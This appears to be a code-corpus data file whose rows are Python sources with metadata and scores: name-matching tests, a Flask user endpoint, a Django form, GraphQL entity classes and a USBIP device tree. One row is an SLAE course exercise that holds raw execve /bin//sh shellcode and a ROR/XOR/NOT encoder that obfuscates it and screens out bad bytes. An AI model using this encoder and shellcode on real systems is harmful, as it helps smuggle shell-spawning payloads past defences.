assert_true(who.match(self.name, '<NAME>'))
assert_true(who.match(self.name, '<NAME>'))
assert_true(who.match(self.name, '<NAME>'))
def test_different_number_initials(self):
assert_true(who.match(self.name, '<NAME>'))
assert_true(who.match(self.name, '<NAME>'))
assert_false(who.match(self.name, '<NAME>'))
assert_false(who.match(self.name, '<NAME>'))
assert_true(who.match('<NAME>', '<NAME>'))
def test_different_initials(self):
assert_false(who.match(self.name, '<NAME>'))
assert_false(who.match(self.name, '<NAME>'))
assert_false(who.match(self.name, '<NAME>'))
assert_false(who.match(self.name, '<NAME>'))
def test_short_names(self):
assert_true(who.match(self.name, '<NAME>'))
# TODO: Should these be true?
assert_false(who.match(self.name, '<NAME>'))
assert_false(who.match(self.name, '<NAME>'))
def test_suffixes(self):
name = '<NAME>'
assert_true(who.match(name, '<NAME>'))
assert_true(who.match(name, '<NAME>r'))
assert_true(who.match(name, '<NAME>, PhD'))
assert_false(who.match(name, '<NAME>, Sr'))
assert_false(who.match(name, '<NAME>, Sr, PhD'))
assert_true(who.match(name, '<NAME>, Jr, PhD'))
def test_equivalent_suffixes(self):
name = '<NAME>r'
assert_true(who.match(name, '<NAME> Jnr'))
assert_false(who.match(name, '<NAME> Snr'))
def test_titles(self):
name = 'Mr. <NAME>'
assert_true(who.match(name, '<NAME>'))
assert_true(who.match(name, 'Sir <NAME>'))
assert_true(who.match(name, 'Dr. <NAME>'))
assert_false(who.match(name, 'Mrs. <NAME>'))
def test_nickname(self):
name = 'Robert "<NAME>'
assert_true(who.match(name, '<NAME>'))
assert_true(who.match('<NAME>', name))
assert_false(who.match(name, '<NAME>'))
assert_false(who.match(name, '<NAME>'))
assert_false(who.match(name, '<NAME>',
options={'check_nickname': False}))
class TestRatio(unittest.TestCase):
def setUp(self):
self.name = '<NAME>'
def test_string(self):
# Only relevant for python 2.X
assert_equal(who.ratio(self.name, str('<NAME>')), 100)
def test_unicode(self):
name = self.name
assert_equal(who.ratio(name, 'attach<NAME>'), 100)
assert_equal(who.ratio(name, '<NAME>'), 100)
assert_true(who.ratio(name, '<NAME>') < 100)
def test_name_and_initials(self):
assert_equal(who.ratio(self.name, '<NAME>'), 100)
assert_equal(who.ratio(self.name, '<NAME>'), 100)
assert_equal(who.ratio(self.name, '<NAME>'), 100)
def test_different_number_initials(self):
assert_equal(who.ratio(self.name, '<NAME>'), 100)
assert_equal(who.ratio(self.name, '<NAME>'), 100)
assert_true(who.ratio(self.name, '<NAME>') < 100)
assert_true(who.ratio(self.name, '<NAME>') < 100)
assert_equal(who.ratio('<NAME>', '<NAME>'), 100)
def test_different_initials(self):
assert_true(who.ratio(self.name, '<NAME>') < 100)
assert_true(who.ratio(self.name, '<NAME>') < 100)
assert_true(who.ratio(self.name, '<NAME>') < 100)
assert_true(who.ratio(self.name, '<NAME>') < 100)
assert_true(who.ratio(self.name, '<NAME>') <
who.ratio(self.name, '<NAME>'))
assert_true(who.ratio(self.name, '<NAME>') <
who.ratio(self.name, '<NAME>'))
assert_true(who.ratio(self.name, '<NAME>') <
who.ratio(self.name, '<NAME>'))
def test_short_names(self):
assert_true(who.ratio(self.name, '<NAME>'))
assert_true(who.ratio(self.name, '<NAME>') < 100)
assert_true(who.ratio(self.name, '<NAME>') < 100)
assert_true(who.ratio(self.name, '<NAME>') <
who.ratio(self.name, '<NAME>'))
def test_suffixes(self):
name = '<NAME>'
assert_equal(who.ratio(name, '<NAME>'), 100)
assert_equal(who.ratio(name, '<NAME>r'), 100)
assert_equal(who.ratio(name, '<NAME>, PhD'), 100)
assert_false(who.ratio(name, '<NAME>, Sr'))
assert_false(who.ratio(name, '<NAME>, Sr, PhD'))
assert_equal(who.ratio(name, '<NAME>, Jr, PhD'), 100)
# Suffix doesn't change a match
assert_equal(who.ratio(name, '<NAME>, Jr'),
who.ratio(name, '<NAME>'))
def test_equivalent_suffixes(self):
name = '<NAME> Jr'
assert_equal(who.ratio(name, '<NAME> Jnr'), 100)
assert_false(who.ratio(name, '<NAME> Snr'))
def test_titles(self):
name = 'Mr. <NAME>'
assert_equal(who.ratio(name, '<NAME>'), 100)
assert_equal(who.ratio(name, 'Sir <NAME>'), 100)
assert_equal(who.ratio(name, 'Dr. <NAME>'), 100)
assert_false(who.ratio(name, 'Mrs. <NAME>'))
# Title doesn't change a match
assert_equal(who.ratio(name, 'Dr. <NAME>'),
who.ratio(name, '<NAME>'))
def test_nickname(self):
name = 'Robert "Evan" Liebowitz'
assert_equal(who.ratio(name, '<NAME>'), 100)
assert_equal(who.ratio('<NAME>', name), 100)
assert_true(who.ratio(name, '<NAME>') < 100)
assert_true(who.ratio(name, '<NAME>') < 100)
assert_true(who.ratio(name, '<NAME>',
options={'check_nickname': False}) < 100)
assert_true(who.ratio(name, '<NAME>') <
who.ratio(name, '<NAME>'))
assert_equal(who.ratio(name, '<NAME>ebowitz'),
who.ratio(name, '<NAME>', 'strict'))
# TODO: Should we ensure that the metadata is up to date?
@nottest
class TestConfig(unittest.TestCase):
def test_titles_all_defined(self):
"""
Check if list of titles is up to date with nameparser
"""
all_titles = (
config.MALE_TITLES |
config.FEMALE_TITLES |
config.GENDERLESS_TITLES
)
assert_equal(all_titles, NAMEPARSER_TITLES)
def test_suffixes_all_defined(self):
"""
Check if list of suffixes is up to date with nameparser
"""
from nameparser.config.suffixes import SUFFIX_ACRONYMS, SUFFIX_NOT_ACRONYMS
all_suffixes = (
config.UNIQUE_SUFFIXES |
config.MISC_SUFFIXES
)
nameparser_suffixes = (
SUFFIX_ACRONYMS |
SUFFIX_NOT_ACRONYMS
)
assert_equal(all_suffixes, nameparser_suffixes)
if __name__ == '__main__':
nose.main()
| en | 0.824139 | # -*- coding: utf-8 -*- # Only relevant for python 2.X # TODO: Should these be true? # Only relevant for python 2.X # Suffix doesn't change a match # Title doesn't change a match # TODO: Should we ensure that the metadata is up to date? Check if list of titles is up to date with nameparser Check if list of suffixes is up to date with nameparser | 2.749582 | 3 |
endpoints/UserEndpoint.py | GardenersGalore/server | 0 | 10352 | import json
from flask import request
from flask_restful import Resource, abort, reqparse
from models.User import User
"""
POST Creates a new resource.
GET Retrieves a resource.
PUT Updates an existing resource.
DELETE Deletes a resource.
"""
class UserEndpoint(Resource):
def post(self):
j = request.get_json()
# need to ensure the required fields are in the json
if "name" not in j:
abort(422, message="name is not in json body")
else:
name = j["name"]
if "username" not in j:
abort(422, message="username not in json body")
else:
username = j["username"]
if "email" not in j:
abort(422, message="email not in json body")
else:
email = j["email"]
if "password" not in j:
abort(422, message="password not in json body")
else:
password = j["password"]
user_obj = User(
name=name,
username=username,
email=email,
password=password,
)
if "phone_number" in j:
user_obj.phone_number = j["phone_number"]
if "experience" in j:
user_obj.experience = j["experience"]
if "pictureURL" in j:
user_obj.pictureURL = j["pictureURL"]
d = user_obj.save()
return json.loads(d.to_json())
def put(self):
# TODO
pass
def delete(self):
# TODO
pass
def get(self):
parser = reqparse.RequestParser()
parser.add_argument('username', required=True, type=str, help='The username of the User')
args = parser.parse_args()
try:
user = json.loads(User.objects.get(username=args['username']).to_json())
except Exception as e:
print(e)
abort(404, message="User doesnt exist: {} doesn't exist".format(args['username']))
return user
| import json
from flask import request
from flask_restful import Resource, abort, reqparse
from models.User import User
"""
POST Creates a new resource.
GET Retrieves a resource.
PUT Updates an existing resource.
DELETE Deletes a resource.
"""
class UserEndpoint(Resource):
def post(self):
j = request.get_json()
# need to ensure the required fields are in the json
if "name" not in j:
abort(422, message="name is not in json body")
else:
name = j["name"]
if "username" not in j:
abort(422, message="username not in json body")
else:
username = j["username"]
if "email" not in j:
abort(422, message="email not in json body")
else:
email = j["email"]
if "password" not in j:
abort(422, message="password not in json body")
else:
password = j["password"]
user_obj = User(
name=name,
username=username,
email=email,
password=password,
)
if "phone_number" in j:
user_obj.phone_number = j["phone_number"]
if "experience" in j:
user_obj.experience = j["experience"]
if "pictureURL" in j:
user_obj.pictureURL = j["pictureURL"]
d = user_obj.save()
return json.loads(d.to_json())
def put(self):
# TODO
pass
def delete(self):
# TODO
pass
def get(self):
parser = reqparse.RequestParser()
parser.add_argument('username', required=True, type=str, help='The username of the User')
args = parser.parse_args()
try:
user = json.loads(User.objects.get(username=args['username']).to_json())
except Exception as e:
print(e)
abort(404, message="User doesnt exist: {} doesn't exist".format(args['username']))
return user
| en | 0.792861 | POST Creates a new resource. GET Retrieves a resource. PUT Updates an existing resource. DELETE Deletes a resource. # need to ensure the required fields are in the json # TODO # TODO | 3.0881 | 3 |
passy_forms/forms/forms.py | vleon1/passy | 0 | 10353 | <reponame>vleon1/passy
from django.forms import forms
class Form(forms.Form):
def get_value(self, name):
self.is_valid() # making sure we tried to clean the data before accessing it
if self.is_bound and name in self.cleaned_data:
return self.cleaned_data[name]
field = self[name]
return field.value() or ""
def to_dict(self):
return {name: self.get_value(name) for name in self.fields}
| from django.forms import forms
class Form(forms.Form):
def get_value(self, name):
self.is_valid() # making sure we tried to clean the data before accessing it
if self.is_bound and name in self.cleaned_data:
return self.cleaned_data[name]
field = self[name]
return field.value() or ""
def to_dict(self):
return {name: self.get_value(name) for name in self.fields} | en | 0.938686 | # making sure we tried to clean the data before accessing it | 2.848369 | 3 |
assignment4/rorxornotencode.py | gkweb76/SLAE | 15 | 10354 | <filename>assignment4/rorxornotencode.py<gh_stars>10-100
#!/usr/bin/python
# Title: ROR/XOR/NOT encoder
# File: rorxornotencode.py
# Author: <NAME>
# SLAE-681
import sys
ror = lambda val, r_bits, max_bits: \
((val & (2**max_bits-1)) >> r_bits%max_bits) | \
(val << (max_bits-(r_bits%max_bits)) & (2**max_bits-1))
shellcode = (
"\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"
)
encoded = ""
encoded2 = ""
print "[*] Encoding shellcode..."
for x in bytearray(shellcode):
# ROR & XOR encoding
z = ror(x, 7, 8)^0xAA
# NOT encoding
y = ~z
if str('%02x' % (y & 0xff)).upper() == "00":
print ">>>>>>>>>> NULL detected in shellcode, aborting."
sys.exit()
if str('%02x' % (y & 0xff)).upper() == "0A":
print ">>>>>>>>>> \\xOA detected in shellcode."
if str('%02x' % (y & 0xff)).upper() == "0D":
print ">>>>>>>>>>> \\x0D detected in shellcode."
encoded += '\\x'
encoded += '%02x' % (y & 0xff)
encoded2 += '0x'
encoded2 += '%02x,' %(y & 0xff)
print "hex version : %s" % encoded
print "nasm version : %s" % encoded2
print "encoded shellcode : %s bytes" % str(len(encoded)/4)
| <filename>assignment4/rorxornotencode.py<gh_stars>10-100
#!/usr/bin/python
# Title: ROR/XOR/NOT encoder
# File: rorxornotencode.py
# Author: <NAME>
# SLAE-681
import sys
ror = lambda val, r_bits, max_bits: \
((val & (2**max_bits-1)) >> r_bits%max_bits) | \
(val << (max_bits-(r_bits%max_bits)) & (2**max_bits-1))
shellcode = (
"\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"
)
encoded = ""
encoded2 = ""
print "[*] Encoding shellcode..."
for x in bytearray(shellcode):
# ROR & XOR encoding
z = ror(x, 7, 8)^0xAA
# NOT encoding
y = ~z
if str('%02x' % (y & 0xff)).upper() == "00":
print ">>>>>>>>>> NULL detected in shellcode, aborting."
sys.exit()
if str('%02x' % (y & 0xff)).upper() == "0A":
print ">>>>>>>>>> \\xOA detected in shellcode."
if str('%02x' % (y & 0xff)).upper() == "0D":
print ">>>>>>>>>>> \\x0D detected in shellcode."
encoded += '\\x'
encoded += '%02x' % (y & 0xff)
encoded2 += '0x'
encoded2 += '%02x,' %(y & 0xff)
print "hex version : %s" % encoded
print "nasm version : %s" % encoded2
print "encoded shellcode : %s bytes" % str(len(encoded)/4)
| en | 0.258869 | #!/usr/bin/python # Title: ROR/XOR/NOT encoder # File: rorxornotencode.py # Author: <NAME> # SLAE-681 # ROR & XOR encoding # NOT encoding | 2.582449 | 3 |
authalligator_client/entities.py | closeio/authalligator-client | 0 | 10355 | import datetime
from enum import Enum
from typing import Any, Callable, Dict, List, Optional, Type, TypeVar, Union, cast
import attr
import ciso8601
import structlog
from attr import converters
from . import enums
from .utils import as_json_dict, to_snake_case
logger = structlog.get_logger()
class Omitted(Enum):
"""Singleton written in a way mypy can parse.
See https://www.python.org/dev/peps/pep-0484/#support-for-singleton-types-in-unions
for more details.
"""
token = 0
OMITTED = Omitted.token
"""A singleton to differentiate between omitted vs explicit :obj:`None`."""
# helper type for entity_converter
U = TypeVar("U", bound="BaseAAEntity")
def entity_converter(
entity_cls, # type: Union[List[Type[U]], Type[U]]
):
# type: (...) -> Callable[[Union[Omitted, U, Dict]], Union[U, Omitted]]
"""
Convert a dictionary response into instances of the entity class.
Usage:
# disambiguates between type_a and type_b based on ``__typename``
converter = entity_converter([TypeA, TypeB])
my_instance = converter({'__typename': 'TypeB'})
XXX: mypy isn't expressive enough to annotate that the return type will be
one of the _specific_ arg types and not the most generic bound base. We'll
unfortunately have to ``# type: ignore`` on lines that call this.
Args:
entity_cls: the class (or classes) the value should be converted into.
If multiple classes are provided as options, ``__typename`` must be
included in the reponse to support disambiguation.
Returns:
A callable that will convert a dictionary to the right entity type. If
more than one entity type is possible, that dictionary must have a
``__typename`` field present, which must match the ``TYPENAME`` on a
provided entity. If none of the provided types match of if the fields
don't align with the provided entity, a ``TypeError`` is raised.
"""
entity_classes = [] # type: List[Type[U]]
if isinstance(entity_cls, (list, tuple)):
entity_classes = entity_cls
else:
entity_classes = [entity_cls]
def _entity_converter(val):
# type: (Union[Dict[str, Any], U, Omitted]) -> Union[U, Omitted]
# check if it's explitly been omitted (don't try to convert those)
if val is OMITTED:
return val
# check if it's already an entity
if any([isinstance(val, e_cls) for e_cls in entity_classes]):
return cast(U, val)
# definitely a dict now, since we check what it was earlier. (present
# for type checking)
val = cast(Dict[str, Any], val)
# if there's more than one possibility for entity classes, pick the
# right one based on ``__typename``
if len(entity_classes) == 1:
# only one option, we don't need an explicit type
selected_cls = entity_classes[0] # type: Type[U]
else:
# a few different return types are expected
typename = val.pop("__typename", None)
if typename is None:
type_options = ", ".join([e.TYPENAME for e in entity_classes])
raise TypeError(
'No "__typename" present to disambiguate between possible '
"types: [{}]".format(type_options)
)
matching_typename = next(
(e for e in entity_classes if e.TYPENAME == typename), None
) # type: Optional[Type[U]]
if matching_typename is None:
raise TypeError('No entity found for type "{}"'.format(typename))
selected_cls = matching_typename
return selected_cls.from_api_response(val)
return _entity_converter
@attr.attrs(frozen=True)
class BaseAAEntity(object):
TYPENAME = "" # type: str
"""The name of the graphql type in the schema.
Used for disambiguation when there's more than one possible type being
returned.
"""
as_dict = as_json_dict
@classmethod
def from_api_response(cls, data):
# type: (Type[U], Dict[str, Any]) -> U
# If __typename is present, this asserts that it matches this class's
# expected typename
typename = data.pop("__typename", None)
if typename and typename != cls.TYPENAME:
raise TypeError(
(
"Given type \"{}\" doesn't match this entity's type: "
'"{}". Is {} the right entity for '
"this data?"
).format(typename, cls.TYPENAME, cls.__name__)
)
# convert top-level kwargs from camelCase to snake_case
kwargs = {to_snake_case(k): v for k, v in data.items()}
# mypy doesn't like that we're providing kwargs to a type whose init
# doesn't accept any kwargs (even though subclasses do have attributes)
return cls(**kwargs) # type: ignore
@attr.attrs(frozen=True)
class AccountError(BaseAAEntity):
TYPENAME = "AccountError"
code = attr.attrib(converter=enums.AccountErrorCode) # type: enums.AccountErrorCode
message = attr.attrib() # type: Optional[str]
retry_in = attr.attrib() # type: Optional[int]
@attr.attrs(frozen=True)
class Account(BaseAAEntity):
TYPENAME = "Account"
provider = attr.attrib(converter=enums.ProviderType) # type: enums.ProviderType
username = attr.attrib() # type: str
access_token = attr.attrib() # type: Optional[str]
access_token_expires_at = attr.attrib(
converter=converters.optional(ciso8601.parse_datetime),
) # type: Optional[datetime.datetime]
@attr.attrs(frozen=True)
class DeleteOperation(BaseAAEntity):
"""Base class for delete operation payloads.
These payloads don't actually have any field information in them. While
there's technically a "_" field in the schema, it's only a placeholder to
work around the language not supporting empty responses. It has no meaning
and will never have a meaningful value.
This class has no specific equivalent type, it's just a convenience type
for these entities.
"""
pass
@attr.attrs(frozen=True)
class DeleteOtherAccountKeysPayload(DeleteOperation):
TYPENAME = "DeleteOtherAccountKeysPayload"
@attr.attrs(frozen=True)
class DeleteAccountKeyPayload(DeleteOperation):
TYPENAME = "DeleteAccountKeyPayload"
@attr.attrs(frozen=True)
class DeleteAccountPayload(DeleteOperation):
TYPENAME = "DeleteAccountPayload"
@attr.attrs(frozen=True)
class AuthorizeAccountPayload(BaseAAEntity):
TYPENAME = "AuthorizeAccountPayload"
account = attr.attrib(
converter=entity_converter(Account), # type: ignore[misc]
) # type: Account
account_key = attr.attrib() # type: str
number_of_account_keys = attr.attrib() # type: int
@attr.attrs(frozen=True)
class VerifyAccountPayload(BaseAAEntity):
TYPENAME = "VerifyAccountPayload"
account = attr.attrib(
converter=entity_converter(Account), # type: ignore[misc]
) # type: Account
@attr.attrs(frozen=True)
class Query(BaseAAEntity):
account = attr.attrib(
default=OMITTED,
converter=entity_converter([Account, AccountError]), # type: ignore[misc]
) # type: Union[Omitted, Account, AccountError]
@attr.attrs(frozen=True)
class Mutation(BaseAAEntity):
# mypy and the attrs plugin doens't like the `Omitted` default + converter
# stuff
authorize_account = attr.attrib( # type: ignore
default=OMITTED,
# ignore unsupport converter warning
converter=cast( # type: ignore[misc]
Union[Omitted, AuthorizeAccountPayload, AccountError],
entity_converter([AuthorizeAccountPayload, AccountError]),
),
) # type: Union[Omitted, AuthorizeAccountPayload, AccountError]
verify_account = attr.attrib( # type: ignore
default=OMITTED,
converter=cast( # type: ignore[misc]
Union[Omitted, VerifyAccountPayload, AccountError],
entity_converter([VerifyAccountPayload, AccountError]),
),
) # type: Union[Omitted, VerifyAccountPayload, AccountError]
delete_account = attr.attrib( # type: ignore
default=OMITTED,
converter=cast( # type: ignore[misc]
Union[Omitted, DeleteAccountPayload, AccountError],
entity_converter([DeleteAccountPayload, AccountError]),
),
) # type: Union[Omitted, DeleteAccountPayload, AccountError]
delete_account_key = attr.attrib( # type: ignore
default=OMITTED,
converter=cast( # type: ignore[misc]
Union[Omitted, DeleteAccountKeyPayload, AccountError],
entity_converter([DeleteAccountKeyPayload, AccountError]),
),
) # type: Union[Omitted, DeleteAccountKeyPayload, AccountError]
delete_other_account_keys = attr.attrib( # type: ignore
default=OMITTED,
# ignore unsupport converter warning
converter=cast( # type: ignore[misc]
Union[Omitted, DeleteOtherAccountKeysPayload, AccountError],
entity_converter([DeleteOtherAccountKeysPayload, AccountError]),
),
) # type: Union[Omitted, DeleteOtherAccountKeysPayload, AccountError]
| import datetime
from enum import Enum
from typing import Any, Callable, Dict, List, Optional, Type, TypeVar, Union, cast
import attr
import ciso8601
import structlog
from attr import converters
from . import enums
from .utils import as_json_dict, to_snake_case
logger = structlog.get_logger()
class Omitted(Enum):
"""Singleton written in a way mypy can parse.
See https://www.python.org/dev/peps/pep-0484/#support-for-singleton-types-in-unions
for more details.
"""
token = 0
OMITTED = Omitted.token
"""A singleton to differentiate between omitted vs explicit :obj:`None`."""
# helper type for entity_converter
U = TypeVar("U", bound="BaseAAEntity")
def entity_converter(
entity_cls, # type: Union[List[Type[U]], Type[U]]
):
# type: (...) -> Callable[[Union[Omitted, U, Dict]], Union[U, Omitted]]
"""
Convert a dictionary response into instances of the entity class.
Usage:
# disambiguates between type_a and type_b based on ``__typename``
converter = entity_converter([TypeA, TypeB])
my_instance = converter({'__typename': 'TypeB'})
XXX: mypy isn't expressive enough to annotate that the return type will be
one of the _specific_ arg types and not the most generic bound base. We'll
unfortunately have to ``# type: ignore`` on lines that call this.
Args:
entity_cls: the class (or classes) the value should be converted into.
If multiple classes are provided as options, ``__typename`` must be
included in the reponse to support disambiguation.
Returns:
A callable that will convert a dictionary to the right entity type. If
more than one entity type is possible, that dictionary must have a
``__typename`` field present, which must match the ``TYPENAME`` on a
provided entity. If none of the provided types match of if the fields
don't align with the provided entity, a ``TypeError`` is raised.
"""
entity_classes = [] # type: List[Type[U]]
if isinstance(entity_cls, (list, tuple)):
entity_classes = entity_cls
else:
entity_classes = [entity_cls]
def _entity_converter(val):
# type: (Union[Dict[str, Any], U, Omitted]) -> Union[U, Omitted]
# check if it's explitly been omitted (don't try to convert those)
if val is OMITTED:
return val
# check if it's already an entity
if any([isinstance(val, e_cls) for e_cls in entity_classes]):
return cast(U, val)
# definitely a dict now, since we check what it was earlier. (present
# for type checking)
val = cast(Dict[str, Any], val)
# if there's more than one possibility for entity classes, pick the
# right one based on ``__typename``
if len(entity_classes) == 1:
# only one option, we don't need an explicit type
selected_cls = entity_classes[0] # type: Type[U]
else:
# a few different return types are expected
typename = val.pop("__typename", None)
if typename is None:
type_options = ", ".join([e.TYPENAME for e in entity_classes])
raise TypeError(
'No "__typename" present to disambiguate between possible '
"types: [{}]".format(type_options)
)
matching_typename = next(
(e for e in entity_classes if e.TYPENAME == typename), None
) # type: Optional[Type[U]]
if matching_typename is None:
raise TypeError('No entity found for type "{}"'.format(typename))
selected_cls = matching_typename
return selected_cls.from_api_response(val)
return _entity_converter
@attr.attrs(frozen=True)
class BaseAAEntity(object):
TYPENAME = "" # type: str
"""The name of the graphql type in the schema.
Used for disambiguation when there's more than one possible type being
returned.
"""
as_dict = as_json_dict
@classmethod
def from_api_response(cls, data):
# type: (Type[U], Dict[str, Any]) -> U
# If __typename is present, this asserts that it matches this class's
# expected typename
typename = data.pop("__typename", None)
if typename and typename != cls.TYPENAME:
raise TypeError(
(
"Given type \"{}\" doesn't match this entity's type: "
'"{}". Is {} the right entity for '
"this data?"
).format(typename, cls.TYPENAME, cls.__name__)
)
# convert top-level kwargs from camelCase to snake_case
kwargs = {to_snake_case(k): v for k, v in data.items()}
# mypy doesn't like that we're providing kwargs to a type whose init
# doesn't accept any kwargs (even though subclasses do have attributes)
return cls(**kwargs) # type: ignore
@attr.attrs(frozen=True)
class AccountError(BaseAAEntity):
TYPENAME = "AccountError"
code = attr.attrib(converter=enums.AccountErrorCode) # type: enums.AccountErrorCode
message = attr.attrib() # type: Optional[str]
retry_in = attr.attrib() # type: Optional[int]
@attr.attrs(frozen=True)
class Account(BaseAAEntity):
TYPENAME = "Account"
provider = attr.attrib(converter=enums.ProviderType) # type: enums.ProviderType
username = attr.attrib() # type: str
access_token = attr.attrib() # type: Optional[str]
access_token_expires_at = attr.attrib(
converter=converters.optional(ciso8601.parse_datetime),
) # type: Optional[datetime.datetime]
@attr.attrs(frozen=True)
class DeleteOperation(BaseAAEntity):
"""Base class for delete operation payloads.
These payloads don't actually have any field information in them. While
there's technically a "_" field in the schema, it's only a placeholder to
work around the language not supporting empty responses. It has no meaning
and will never have a meaningful value.
This class has no specific equivalent type, it's just a convenience type
for these entities.
"""
pass
@attr.attrs(frozen=True)
class DeleteOtherAccountKeysPayload(DeleteOperation):
TYPENAME = "DeleteOtherAccountKeysPayload"
@attr.attrs(frozen=True)
class DeleteAccountKeyPayload(DeleteOperation):
TYPENAME = "DeleteAccountKeyPayload"
@attr.attrs(frozen=True)
class DeleteAccountPayload(DeleteOperation):
TYPENAME = "DeleteAccountPayload"
@attr.attrs(frozen=True)
class AuthorizeAccountPayload(BaseAAEntity):
TYPENAME = "AuthorizeAccountPayload"
account = attr.attrib(
converter=entity_converter(Account), # type: ignore[misc]
) # type: Account
account_key = attr.attrib() # type: str
number_of_account_keys = attr.attrib() # type: int
@attr.attrs(frozen=True)
class VerifyAccountPayload(BaseAAEntity):
TYPENAME = "VerifyAccountPayload"
account = attr.attrib(
converter=entity_converter(Account), # type: ignore[misc]
) # type: Account
@attr.attrs(frozen=True)
class Query(BaseAAEntity):
account = attr.attrib(
default=OMITTED,
converter=entity_converter([Account, AccountError]), # type: ignore[misc]
) # type: Union[Omitted, Account, AccountError]
@attr.attrs(frozen=True)
class Mutation(BaseAAEntity):
# mypy and the attrs plugin doens't like the `Omitted` default + converter
# stuff
authorize_account = attr.attrib( # type: ignore
default=OMITTED,
# ignore unsupport converter warning
converter=cast( # type: ignore[misc]
Union[Omitted, AuthorizeAccountPayload, AccountError],
entity_converter([AuthorizeAccountPayload, AccountError]),
),
) # type: Union[Omitted, AuthorizeAccountPayload, AccountError]
verify_account = attr.attrib( # type: ignore
default=OMITTED,
converter=cast( # type: ignore[misc]
Union[Omitted, VerifyAccountPayload, AccountError],
entity_converter([VerifyAccountPayload, AccountError]),
),
) # type: Union[Omitted, VerifyAccountPayload, AccountError]
delete_account = attr.attrib( # type: ignore
default=OMITTED,
converter=cast( # type: ignore[misc]
Union[Omitted, DeleteAccountPayload, AccountError],
entity_converter([DeleteAccountPayload, AccountError]),
),
) # type: Union[Omitted, DeleteAccountPayload, AccountError]
delete_account_key = attr.attrib( # type: ignore
default=OMITTED,
converter=cast( # type: ignore[misc]
Union[Omitted, DeleteAccountKeyPayload, AccountError],
entity_converter([DeleteAccountKeyPayload, AccountError]),
),
) # type: Union[Omitted, DeleteAccountKeyPayload, AccountError]
delete_other_account_keys = attr.attrib( # type: ignore
default=OMITTED,
# ignore unsupport converter warning
converter=cast( # type: ignore[misc]
Union[Omitted, DeleteOtherAccountKeysPayload, AccountError],
entity_converter([DeleteOtherAccountKeysPayload, AccountError]),
),
) # type: Union[Omitted, DeleteOtherAccountKeysPayload, AccountError]
| en | 0.804767 | Singleton written in a way mypy can parse. See https://www.python.org/dev/peps/pep-0484/#support-for-singleton-types-in-unions for more details. A singleton to differentiate between omitted vs explicit :obj:`None`. # helper type for entity_converter # type: Union[List[Type[U]], Type[U]] # type: (...) -> Callable[[Union[Omitted, U, Dict]], Union[U, Omitted]] Convert a dictionary response into instances of the entity class. Usage: # disambiguates between type_a and type_b based on ``__typename`` converter = entity_converter([TypeA, TypeB]) my_instance = converter({'__typename': 'TypeB'}) XXX: mypy isn't expressive enough to annotate that the return type will be one of the _specific_ arg types and not the most generic bound base. We'll unfortunately have to ``# type: ignore`` on lines that call this. Args: entity_cls: the class (or classes) the value should be converted into. If multiple classes are provided as options, ``__typename`` must be included in the reponse to support disambiguation. Returns: A callable that will convert a dictionary to the right entity type. If more than one entity type is possible, that dictionary must have a ``__typename`` field present, which must match the ``TYPENAME`` on a provided entity. If none of the provided types match of if the fields don't align with the provided entity, a ``TypeError`` is raised. # type: List[Type[U]] # type: (Union[Dict[str, Any], U, Omitted]) -> Union[U, Omitted] # check if it's explitly been omitted (don't try to convert those) # check if it's already an entity # definitely a dict now, since we check what it was earlier. (present # for type checking) # if there's more than one possibility for entity classes, pick the # right one based on ``__typename`` # only one option, we don't need an explicit type # type: Type[U] # a few different return types are expected # type: Optional[Type[U]] # type: str The name of the graphql type in the schema. Used for disambiguation when there's more than one possible type being returned. # type: (Type[U], Dict[str, Any]) -> U # If __typename is present, this asserts that it matches this class's # expected typename # convert top-level kwargs from camelCase to snake_case # mypy doesn't like that we're providing kwargs to a type whose init # doesn't accept any kwargs (even though subclasses do have attributes) # type: ignore # type: enums.AccountErrorCode # type: Optional[str] # type: Optional[int] # type: enums.ProviderType # type: str # type: Optional[str] # type: Optional[datetime.datetime] Base class for delete operation payloads. These payloads don't actually have any field information in them. While there's technically a "_" field in the schema, it's only a placeholder to work around the language not supporting empty responses. It has no meaning and will never have a meaningful value. This class has no specific equivalent type, it's just a convenience type for these entities. # type: ignore[misc] # type: Account # type: str # type: int # type: ignore[misc] # type: Account # type: ignore[misc] # type: Union[Omitted, Account, AccountError] # mypy and the attrs plugin doens't like the `Omitted` default + converter # stuff # type: ignore # ignore unsupport converter warning # type: ignore[misc] # type: Union[Omitted, AuthorizeAccountPayload, AccountError] # type: ignore # type: ignore[misc] # type: Union[Omitted, VerifyAccountPayload, AccountError] # type: ignore # type: ignore[misc] # type: Union[Omitted, DeleteAccountPayload, AccountError] # type: ignore # type: ignore[misc] # type: Union[Omitted, DeleteAccountKeyPayload, AccountError] # type: ignore # ignore unsupport converter warning # type: ignore[misc] # type: Union[Omitted, DeleteOtherAccountKeysPayload, AccountError] | 2.312008 | 2 |
library/device.py | lompal/USBIPManager | 24 | 10356 | <gh_stars>10-100
from library import config, ini, lang, log, performance, periphery, queue
from asyncio import get_event_loop
from threading import Thread, Event
from PyQt5.QtCore import QObject, pyqtSignal
from PyQt5.QtWidgets import QTreeWidgetItem
# noinspection PyPep8Naming
class Signal(QObject):
""" PyQt signals for correct daemon device tree calls from a different thread """
addTopLevelItem_ = pyqtSignal(object)
setText_ = pyqtSignal(str, int, str)
setToolTip_ = pyqtSignal(str, int, object)
setIcon_ = pyqtSignal(str, int, object)
def addTopLevelItem(self, daemon):
""" Load daemon as a top-level item - emit the signal """
self.addTopLevelItem_.emit(daemon)
def setText(self, bid, col, baud):
""" Set incoming/outgoing bandwidth - emit the signal """
self.setText_.emit(bid, col, baud)
def setToolTip(self, bid, col, html):
""" Set tooltip for a daemon during capturing operation - emit the signal """
self.setToolTip_.emit(bid, col, html)
def setIcon(self, bid, col, icon):
""" Set status icon for a daemon during capturing operation - emit the signal """
self.setIcon_.emit(bid, col, icon)
# noinspection PyPep8Naming
class Tree(metaclass=config.Singleton):
""" Daemon device bandwidth tree """
def __init__(self, base, ip_addr):
self._base = base
self._ip_addr = ip_addr
self._sw_config = ini.SWConfig(self._base)
self._lang = lang.Tree
self._signal = Signal()
self._signal.addTopLevelItem_.connect(lambda __daemon: self._addTopLevelItem(__daemon))
self._signal.setText_.connect(lambda __bid, __col, __baud: self._setText(__bid, __col, __baud))
self._signal.setToolTip_.connect(lambda __bid, __col, __html: self._setToolTip(__bid, __col, __html))
